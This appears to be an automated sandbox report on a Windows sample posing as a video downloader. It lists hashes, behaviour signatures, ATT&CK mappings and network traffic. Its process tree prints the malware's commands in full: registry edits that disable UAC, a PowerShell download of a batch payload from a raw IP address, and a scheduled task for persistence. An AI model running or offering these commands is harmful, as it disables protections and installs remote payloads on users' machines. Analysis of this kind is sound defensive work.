Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
135s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
28/09/2024, 11:49 UTC
General
-
Target
pornhub_downloader.2.exe
-
Size
88KB
-
MD5
759f5a6e3daa4972d43bd4a5edbdeb11
-
SHA1
36f2ac66b894e4a695f983f3214aace56ffbe2ba
-
SHA256
2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
-
SHA512
f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385
-
SSDEEP
1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf+xB4O5:fq6+ouCpk2mpcWJ0r+QNTBf+LV
Malware Config
Signatures
-
UAC bypass 3 TTPs 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Powershell Invoke Web Request.
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies Internet Explorer settings 1 TTPs 35 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of WriteProcessMemory 55 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.2.exe"C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.2.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FF84.tmp\FF85.tmp\FF86.bat C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.2.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE","goto :target","","runas",1)(window.close)3⤵
- Access Token Manipulation: Create Process with Token
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE"C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE" goto :target4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AC.tmp\AD.tmp\AE.bat C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE goto :target"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F6⤵
- UAC bypass
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F6⤵
- UAC bypass
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F6⤵
- UAC bypass
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg query HKEY_CLASSES_ROOT\http\shell\open\command7⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.pornhub.com/6⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2304 CREDAT:275457 /prefetch:27⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h d:\net6⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\schtasks.exeSchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
-
-
Network
-
DNSwww.pornhub.comRemote address:8.8.8.8:53Requestwww.pornhub.comIN AResponsewww.pornhub.comIN CNAMEpornhub.compornhub.comIN A66.254.114.41 -
DNSRemote address:66.254.114.41:443ResponseHTTP/1.1 400 Bad request
Content-length: 90
Cache-Control: no-cache
Connection: close
Content-Type: text/html
-
DNSRemote address:66.254.114.41:443ResponseHTTP/1.1 400 Bad request
Content-length: 90
Cache-Control: no-cache
Connection: close
Content-Type: text/html
-
DNSRemote address:66.254.114.41:443ResponseHTTP/1.1 400 Bad request
Content-length: 90
Cache-Control: no-cache
Connection: close
Content-Type: text/html
-
66.254.114.41:443www.pornhub.comtls, http
HTTP Response
400 -
66.254.114.41:443www.pornhub.comtls, http
HTTP Response
400 -
66.254.114.41:443www.pornhub.comtls, http
HTTP Response
400 -
204.79.197.200:443ieonline.microsoft.comtls
-
204.79.197.200:443ieonline.microsoft.comtls
-
204.79.197.200:443ieonline.microsoft.comtls
-
8.8.8.8:53www.pornhub.comdns
DNS Request
www.pornhub.com
DNS Response
66.254.114.41
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Access Token Manipulation
1Create Process with Token
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Access Token Manipulation
1Create Process with Token
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify Tools
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
579B
MD5f55da450a5fb287e1e0f0dcc965756ca
SHA17e04de896a3e666d00e687d33ffad93be83d349e
SHA25631ad6648f8104138c738f39ea4320133393e3a18cc02296ef97c2ac9ef6731d0
SHA51219bd9a319dfdaad7c13a6b085e51c67c0f9cb1eb4babc4c2b5cdf921c13002ca324e62dfa05f344e340d0d100aa4d6fac0683552162ccc7c0321a8d146da0630
-
Filesize
252B
MD5e0f77073e17dcab218167a42ee498b51
SHA1dfc13ba55676aff1b277dce8d21182fdac74185e
SHA2561bf9ee452afe5a23ad793ae19b71f487deb3b75318209747a612ef8f757669ee
SHA5125a94d14c7a0aa4db76170fe2250fe25ba99864501dcf263788d79d77de939d85d6f4df1550835c7d7beea9db9e10157f10cd8d8586ef6ab1bb1b07529f027d75
-
Filesize
342B
MD5ab241fc698e51c0fe2b053fe3d0a75b3
SHA1229d8c444df63e046f4eb27a37f0df112e0fdfac
SHA2560112a57a0085388f1b4979c0702417f9ff87e822552a5b85b5b0e46fc7b16579
SHA5127357531d1971feb87346040dfdaf47cc36baf57dbf6425856755005473e93948146346c03a163b636eb09af0de9e40bf25c2fedcf68af95cee85a3c5984e5059
-
Filesize
342B
MD5e33959db3d29dbaa3c61cc522ebdbb45
SHA16b0343f0e7c32847b9bdbc33495e69b98042b20e
SHA2563ac764fc0f5ed26c362561e2bf7cc2b07d8d0d59ce4e60957fbfe8b48e5cc165
SHA5121e6276398f34777f5ea4641710bb30635a69684334203d9145a95156cdf97496fe3690cfba34c4f3fdf5bf7bd7a0455c762e37f83c826e4df0b29d9f0e2172a4
-
Filesize
342B
MD5a9aa6c2dae365503df8e1dee4760301c
SHA1aea65add79130f172406a6993cf220a6d23edec1
SHA256308bfde2d5202e2ccc38b412c7568276fcd57db7f2cb0a2939ec5d01fbe94341
SHA51292284b8efe0bedda94e77d7a0b3cea7da761c0e1a2e525926ca8fea819bbd8b1e31a77c4b750ebf521b3cebfd5be788930233e8d971c9cee524a59101e34b32a
-
Filesize
342B
MD57b1a33eac166d4ec19e6572594e265a6
SHA1de857febfc6e1284d19601101baac9ac1bc93204
SHA2563e2a894f3ec824aca91cb9d8e140ef1e6209f4db48dee3a5941d238630c4a4e0
SHA512e221d8da1d4109cd0ff417f69fbeb6ef792cb5b0b400ad8ecd5cf936dca91bd3320d5f3ae39b381a32d22171e80659cefc35e05c6d00d1d62a7022a57690c5f6
-
Filesize
342B
MD5a0aacb10709bd41e63dfe9b663533992
SHA1999c9fced6a73f7dbc956afc7e1b978cb6440b1d
SHA25686fe5ce0c8b6563dbb3875bb1417d9e1d5e870c33f5129ac66e88618a68e567a
SHA512b00333dfbe9c0db6d28060f89e1b5c4863827c82285551bb63baea562b56cafdc663fc3124a10bd3ea0bfdf060b9230340e675f287c65b2b017e1bc86648624c
-
Filesize
342B
MD5720c4da2734bb1e98fa29a363737c5d0
SHA114a6f33cca967b0869ae0af58e5286ec360c0986
SHA256e7a456e945dd306fe0434576884d76f8e910f2f683ff04b56b1f2cce9394ce0a
SHA5128e919fcd5178ef719480eaddc9fa3bb6870dcc631306dde27da9f3942697015d56e2020a1d01a4bdf2ac157b64bb9a54a2ff335c84ada93cdafdec4450d041b9
-
Filesize
342B
MD54b2cc32f809fc8f28f47161c9538b8c6
SHA140139d4439171dd69c7a01eb3722343df819301c
SHA256a686c16fd74c6fbbfd70dd2080f0de75fa4fcaef4a85926eaf93de241f0d71ba
SHA5122f75dcd4897022b1811175bb2664a7dbec9022ac9b6b18f4c6f57dbec0ad776ddb23347c315f0edfba12f02825de239806b322093692d06fbfe50c931dbcddf3
-
Filesize
342B
MD5f48afde1ba8829936ac7ad7f0b3a868b
SHA16dc08af5002a5f325293f9b077f0c1eb80d27f50
SHA256bd4c4f429417ece0dd3d92a3867cc98edd381f311c095d8bc8c6844683480f7a
SHA5128c45d9d236c4fe13395d6381acbc9f610e99cf24d61907127243fec31a0122b48cfefb3f35dff4e9f83ff61ddee2dcfcd8e1fbc8c1d31772a58ec8a5f362a6a9
-
Filesize
342B
MD593da044f1666d00dcb9b90595af46272
SHA141f43c703437fbb34222a824edb857a4482c339a
SHA2561e8e958274b79031064e96774236e1d4c8f7453734e048d10dad603b3df922a7
SHA51257b839339093bb59d1b2129a18ac660bd55a6cd06c81f10eeb08813c1940021676d199c5a0e6cc8d09b62409461afb23691c40d79b61ffe278eceef5eef2bd41
-
Filesize
342B
MD51f0cbc793448a63d3d0ac4010362332a
SHA16bea6ef503fcbe871dbae0141f6c5f15b0ed31fa
SHA2563b4b60c7f5c29ef7da886cc395029e0e1f2f9ddbf19adf21d608b418168385cc
SHA5120737c2e5403c5081a313d015098a4e19ac38dca2b494a46b5f5b935236e71f72e6ed297a122fd19ebe80a0dbf2a158018bfcda9e316596919311fd16ea00e3c1
-
Filesize
342B
MD5a447a8a77c171169889edebb086105c5
SHA1ce360ea1f6be7e0fb13b186f84ae03d2d36e0ab4
SHA25669ea8eda100bd038ee6747006e855113f9ab9410b36961598609428a52c25c93
SHA512ad9f316ac9da76da9522c867c5c07f483ff08e44cd14d09a0514dc01e02e28740d577e8ed9a03ff3d0b9c2ff11036ef474fae8691daf2c2ecef7c3c44ee6c3d1
-
Filesize
342B
MD5ea4f6cd53a743595f5d92a9399fd3d07
SHA1b825adecdd48e0dd64b28f674841088c7395f766
SHA256c786fd6df73d2cd203735c85f0e0f8eedf9d313a3c348ed1f2dcb36a002a1c71
SHA51237cb3c9390594739a898fe6a07b66703ea052f6504f416bf7b560c8ad052f068686e66a3026e6b6e97e42cfde795b661e920a6d5aa16b8ef2c49a8a2d1d5a6a6
-
Filesize
342B
MD582151200d3e66a2ebe259da686bd5c47
SHA1fb4b1cb5f27617023bd58de52b00731949b71bcb
SHA256732c6a58220af88bdd1db00484d604e35edb0e06dbc5eeb3cbcad0eaa12d17ac
SHA5127cfecbb9bc9f5d8be0fd89db9063b959119a910a1f4c310c9636b4f01c4bcd0a2543cf297af118655e580ea3a49e0784140860e01f2c42ec802c2fc26ec5f8d8
-
Filesize
342B
MD5de0d03b5f4a633e09244a84b5461221d
SHA1605ce7f8bcb09422758130dc762473dbe499ad38
SHA256ebe2dc40a8d2585d4a407ea45876ef128ba22d94e609f8c190a2e305f1c13cf7
SHA51252a3da5c4f2e7f82ba1397c1dd79f0e243bcd0ee436b0affb333328af4673a3c3e4cfb5465d15979c5a020cc840dba923b6d7ca9ba3d23fe203ca5a23e910f98
-
Filesize
342B
MD57224bb40e1d51767b1017e3e4299bb39
SHA12a52f85e9a5ebc3dc4951b53c1e8d5c410aad951
SHA2561edfb658143fb558dac2e3da5123b98b7064c61d7b911cb766a1193b10c12fd5
SHA5120edfeea65754058c3c1b7f2d517751163281da239bc4f8f29ef6e339ab73a0aa9db6c15e415ef02c1fd19978ae22175c03b17fb621c64249836c74c68f58a8bc
-
Filesize
342B
MD58f08759d05e553f5a6ae4a7a55e724b8
SHA1ae0d7d3a262f91cdd22aa3cd894c630441502788
SHA256c819ae55c8ad5cb59e9ffddc4be43c42b47d72a3b485e8d225b3dcf631ae8b48
SHA512bc57a29356c262ba955381f80cc04c0628db3b4e81d4db1eb02e8ba1b73d95f072f8698144e5d3683bce856f878cc1f90ed5a40429de4aaedeeabb51252b2d1d
-
Filesize
342B
MD5a5a57d141e32f37e8041bfe685d5cf10
SHA1c366c592fd4c1c579c80bd1a70c8e42320b8ccbd
SHA25674530878b5edb1b11e3a238203fdf990e0d161c1823cd2a07309d1c76f876c99
SHA51246b1a596dd163705ae8b3f9c66ab7c5edfc0449822313268b2166c259275b0cb2d69907a6fe09e0ea7dfd49ac4ebe23db0ac175dc30edc6e11a857217d920702
-
Filesize
342B
MD5aa14af4eabe06ae3926b8348501d22d9
SHA118bc46803c9454d57139d6fceea43898ed69493b
SHA256698c2839e0088ce2e62a9e17e37d36c21421b17d2680ab98b7d7b807d90bc615
SHA51247271113867adab66a4a3678683a25447a263a65f9b43bdefbd0584e30e1387ce86ad36646f465e7562973fe5c5792ab4d8ad0d4d97a2529bc2119faec3eb91b
-
Filesize
342B
MD5b9de599b0113be99661a7a806718ef36
SHA1d60fb6c0c341429fcfd43821b79ccdc79f537f47
SHA2561481b623cc59989ae39c449a5a577230d12c3d2f132f25250fef89fdf1ee879a
SHA512c0ca4db4e10e69f086ddf98166274c9468f19adf88398f3a20dd5664daf7d8a79cf1e12a649f675061a10f5199828955104106c4905a73f79b40c3accd3fe781
-
Filesize
342B
MD5a84419409d326f3449b896a54173d10b
SHA1ba950637f1c7a89f78f62ff777961753c317327f
SHA256dfd487a7127f944ff386f2051f67d9970ffca68a8f608d79ac67737d21437f00
SHA512216e20e195035df510151d4305d610df8a97205620256cb76fd99aceabf41b0371c453b63c8fb1d84a7eab090feffe2577e5dbc5fe91e3d6af43189fd131505b
-
Filesize
342B
MD5ae876b26360d9c41d2102eaf827b89a2
SHA1f6eab2c9fc94d4b92ee13c8c619eea7f3f1eca59
SHA256bf2402be7c643e584e5d643d4fad6c3ffcf813c2f349dc71e3a1f0cef36a5e1e
SHA512ed881a63c7f5833375dcb16d26622fd2b4a1ee46278921186cb41e16a22bd0f199a3b18dc7a1317aa858dc934bbee9b308d7ef0572788973e9f0fd88ae7e6107
-
Filesize
342B
MD589787aeac63de11fc16fa88e17bb2e45
SHA10020da0d9bf702d557eab54a04169b353090df0e
SHA2563fc2e1fccd5a94b31ced0df8c2e1b09e207d97698e4dd53123617d69fa19c760
SHA512dd8e100e498890dabb336402e84f3f102e20e5b5d71a3eaf27a4ced9c96d379e4f81145624d7b006ce9561bb3f9fc6215726dddc875246a3baaf3c55a199e12b
-
Filesize
342B
MD58db73896443435559aabefaea323f132
SHA1662f52e4ca4a6182d080c31b78b350a4e65c4f56
SHA256270090b0b540e7c454d8fdd8c38d55057c8dd28f262c5bc97fc725f4daaa2029
SHA512e7c817e08ff87fbedd9bd7d2556b86eda62df0967d6642e70153d76b637269edf30331310691a89192614981b1b0b3ba47305005adc0891e0fc8819eb23b75fa
-
Filesize
342B
MD5295bb7d92a918c9005efa147d0e989ba
SHA11edda60ee4b7a02caa374e3f64d2455e1e7f7286
SHA256c258300ad266a0559d5a4f0604a4194b8d7b1a0ec2829a15f5ea2a67605d51a0
SHA5123978e9b8efd6274a0766d9c213bcc51593dce026c5df5f85e7bd270055755b611c833d714072f90936869d9c5fba31e83266e0d41f26dd2a289796a5add9e584
-
Filesize
342B
MD5ddb384e2a88249ca36576b5af682a35f
SHA1545b7fafbaf6312991ae0ba5a17dbfff8b34712b
SHA256dc189cbe48bbf1eacbfbef3722536c822849882d42360b479a4fe6360d51be91
SHA512e14074b7dd76c1f5e04251ad7a2d323ae075951ea24efaa0e8d436d5d211c0bdebf49c939981d352f003810bbe355395cc68781730419c099c4281ca1c2e7756
-
Filesize
342B
MD5141cd9d54d189a7ee9ba9c5ee8e2fce2
SHA1da96396afe14f5302c33f26ac0db58796e839fa3
SHA256e4ead9bec1608b00e0173d3e1bc88272bfeb813ec8b7a28ce147342907e82a11
SHA512fcb291c90a4dd840199119a397bf7c304770ee50e7a64eb382373b80b834680dd5b11f6e925cb6916a3ee4c4c15d4be848180c602f2b7c61164e05187e6f48a6
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD59856d2fe29a28c54c5943c2150f7bae1
SHA1f7532a2a79b1b6aca1c151b34fe8b1ce2c798e97
SHA2560b6140b4764863f3263b0be87f35c9afe9a849823eccf37259bed08baa93e999
SHA512002db693f5664f80e58bb3590f32068f611bc97d3f71324abb659dd1fd0bffe3df36379ae92ffbeabde10bd6245b3c069b56ba4d8b4608c634a2525e7a76735f
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b